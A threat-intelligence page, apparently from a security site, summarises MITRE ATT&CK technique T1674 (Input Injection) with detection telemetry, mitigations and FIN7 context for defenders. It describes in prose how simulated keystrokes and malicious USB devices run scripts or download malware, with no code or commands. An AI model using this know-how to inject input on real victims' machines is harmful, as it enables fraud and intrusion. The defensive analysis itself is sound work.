T1674: Input Injection
Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).
For example, adversaries have used tooling that monitors the Windows message loop to detect when a user visits bank-specific URLs. If detected, the tool then simulates keystrokes to open the developer console or select the address bar, pastes malicious JavaScript from the clipboard, and executes it - enabling manipulation of content within the browser, such as replacing bank account numbers during transactions.[1][2]
Adversaries have also used malicious USB devices to emulate keystrokes that launch PowerShell, leading to the download and execution of malware from adversary-controlled servers.[3]
Analyst context for executives and security teams
Input Injection matters because it can turn a trusted user session into an execution path: simulated keystrokes or HID-style input can launch interpreters, paste commands or scripts, and manipulate GUI applications without using a traditional exploit. For leaders, this is a reminder that endpoint risk is not only malware files and network traffic; physical peripheral control, user-session monitoring, clipboard/script behavior, and application execution policy can materially affect business continuity and fraud resilience.
Executive priority
Prioritize this technique where workstations have access to financial applications, administrative consoles, sensitive SaaS sessions, or operational systems. The key management question is whether the organization can prevent or quickly investigate unauthorized hardware use and unexpected script or interpreter execution initiated from an interactive session. This also supports audit and compliance evidence around device control, application control, and endpoint monitoring, especially for environments exposed to mailed devices, shared workstations, or high-value transaction workflows.
Technical view
ATT&CK places T1674 under Execution for Windows, macOS, and Linux. SOC and IR teams should validate coverage for simulated keyboard activity that results in command interpreters, scripts, browser developer tooling, address-bar interaction, clipboard paste-and-execute behavior, or GUI-driven actions. Because MITRE does not provide official detection text for this object, use the related DET0568 detection strategy as a pointer for detection engineering, but validate locally against available endpoint, device-control, process, browser, and script telemetry. Relationship context also highlights M1034 Limit Hardware Installation and M1038 Execution Prevention as the most directly supported control families.
Likely telemetry
- Endpoint process creation and parent/child process relationships for shells, scripting engines, and downloaded executables
- Script execution logs and command-line telemetry where available
- USB/HID device connection, driver installation, and hardware policy events
- Endpoint security alerts for unapproved peripheral use or device-control violations
- Clipboard, browser, or GUI interaction telemetry where available and privacy-appropriate
Detection direction
- Validate whether DET0568 or an equivalent local analytic exists for input injection behavior; MITRE supplied no official detection details in the technique object.
- Correlate new or unusual HID/USB device activity with rapid process launches, interpreter execution, script execution, or outbound downloads.
- Tune for false positives from legitimate automation, accessibility tools, remote support tools, testing frameworks, and approved macro or RPA workflows.
- Review high-risk workflows such as online banking, finance operations, administrative portals, and browser-based business applications for signs of scripted GUI manipulation.
- Do not rely only on malware file detection; this behavior may use legitimate user-interface paths and trusted applications.
Mitigation priorities
- Start with M1034-style hardware controls: restrict unauthorized peripheral and HID usage, limit driver installation, and enforce hardware usage policy on sensitive endpoints.
- Apply M1038-style execution prevention: restrict unauthorized scripts, interpreters, and untrusted code execution where operationally feasible.
- Harden high-value workstations used for financial, administrative, or operational tasks with stronger device control and application control baselines.
- Create incident-response playbooks for suspicious USB/HID events followed by script or command execution.
- Maintain exception governance so legitimate accessibility, support, automation, and business peripherals do not become unmanaged blind spots.
Analyst notes and limits
The FIN7 relationship indicates ATT&CK associates this technique with that group, whose profile is financially motivated and spans multiple industries, but this take does not infer current targeting or customer exposure. The official examples reference browser manipulation in banking contexts and malicious USB devices leading to PowerShell-based download and execution, so the practical defensive focus is endpoint execution control plus hardware/device governance.
The ATT&CK object provides no official detection text, no procedure details beyond cited examples, and no platform-specific implementation guidance beyond Windows, macOS, and Linux. Local telemetry, privacy constraints, endpoint tooling, and approved automation practices will determine whether detections are feasible and reliable.
Input Injection
Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).
For example, adversaries have used tooling that monitors the Windows message loop to detect when a user visits bank-specific URLs. If detected, the tool then simulates keystrokes to open the developer console or select the address bar, pastes malicious JavaScript from the clipboard, and executes it - enabling manipulation of content within the browser, such as replacing bank account numbers during transactions.[1][2]
Adversaries have also used malicious USB devices to emulate keystrokes that launch PowerShell, leading to the download and execution of malware from adversary-controlled servers.[3]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Groups, software, and campaigns
G0046: FIN7
FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of FIN7 was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to big game hunting (BGH), including use of REvil ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but multiple threat groups have been observed using Carbanak, leading these groups to be tracked separately.[1][2][3][4][5][6][7]
All related ATT&CK context
Mitigation direction
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | ffc26fd457e9… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
BleepingComputer BackSwap
Catalin Cimpanu. (2018, May 25). BackSwap Banking Trojan Uses Never-Before-Seen Techniques. Retrieved March 27, 2025.
Open source URL -
[2]
welivesecurity BackSwap
Michal Poslušný. (2018, May 25). BackSwap malware finds innovative ways to empty bank accounts. Retrieved March 27, 2025.
Open source URL -
[3]
BleepingComputer USB
Ionut Ilascu. (2020, March 27). FBI: Hackers Sending Malicious USB Drives & Teddy Bears via USPS. Retrieved March 27, 2025.
Open source URL -
[4]
mitre-attack T1674Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.